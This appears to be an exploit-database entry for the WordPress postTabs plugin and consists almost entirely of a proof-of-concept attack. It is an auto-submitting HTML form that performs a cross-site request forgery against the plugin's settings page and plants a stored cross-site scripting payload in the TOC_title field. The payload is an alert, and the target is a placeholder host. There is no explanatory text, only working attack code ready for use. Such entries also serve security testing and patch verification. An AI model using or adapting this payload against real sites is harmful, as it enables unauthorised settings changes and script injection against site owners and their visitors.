Share
## https://sploitus.com/exploit?id=WPEX-ID:7F2AE2C9-57D4-46A0-A9A1-585EC543B153
<form id="test" action="https://example.com/wp-admin/options-general.php?page=postTabs.php" method="POST">
<input type="text" name="line" value="#fff">
<input type="text" name="active_font" value="#fff">
<input type="text" name="active_bg" value="#fff">
<input type="text" name="over_font" value="#fff">
<input type="text" name="over_bg" value="#fff">
<input type="text" name="inactive_font" value="#fff">
<input type="text" name="inactive_bg" value="#fff">
<input type="text" name="align" value="left">
<input type="text" name="TOC_title" value='"><img src=x onerror=alert(/XSS/)>'>
<input type="text" name="TOC" value="END">
<input type="text" name="list_link" value="hideshow">
<input type="text" name="single_link" value="hideshow">
<input type="text" name="cookies" value="1">
<input type="text" name="show_perma" value="never">
<input type="text" name="submit_postTab" value="Update Settings ยป">
</form>
<script>
document.getElementById("test").submit();
</script>